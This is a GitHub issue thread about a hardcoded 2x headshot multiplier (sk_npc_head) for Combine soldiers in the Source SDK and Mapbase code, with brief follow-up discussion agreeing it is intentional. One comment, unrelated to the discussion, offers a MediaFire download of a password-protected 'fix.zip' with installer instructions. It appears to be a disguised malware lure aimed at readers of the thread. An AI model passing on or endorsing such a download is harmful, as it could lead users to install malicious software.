### ISSUE TITLE
[CODE] sk_npc_head hardcoded to return 2x for combine soldiers

### ISSUE THREAD

**Issue by meatspace** [mapbase-source/source-sdk-2013#319]
### Describe the bug

the headshot multiplier sk_npc_head is hardcoded for Combine Soldiers to 2x
https://github.com/ValveSoftware/source-sdk-2013/blob/0d8dceea4310fde5706b3ce1c70609d72a38efdf/sp/src/game/server/hl2/npc_combines.cpp#L213C1-L213C16
(code seems to be identical in mapbase)

### Steps to reproduce
ent_create a soldier, use ent_text to see their health
try changing sk_npc_head value and shooting them to see it doesn't change from 2x

### Expected behavior
sk_npc_head to not be hardcoded for soldiers 

### Additional context
Exact code found here on hl2:update steam discussion page:
https://steamcommunity.com/app/290930/discussions/2/133259227523941178/

i checked the default skill.cfg for base half life 2 and its default value is set to 3 so fixing this might have the unintended consequence of making the game easier?

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Yankumo-Koishi** [comment]
Not sure if it really counts into bug, I think if it's gonna be fixed, we should have a way to toggle it on/off

**Comment by meatspace** [comment]
yes its clearly intentional. i should not have not given it the bug label, thats my mistake. 

im simply bringing this to attention and not sure if their is a fix without breaking the difficulty
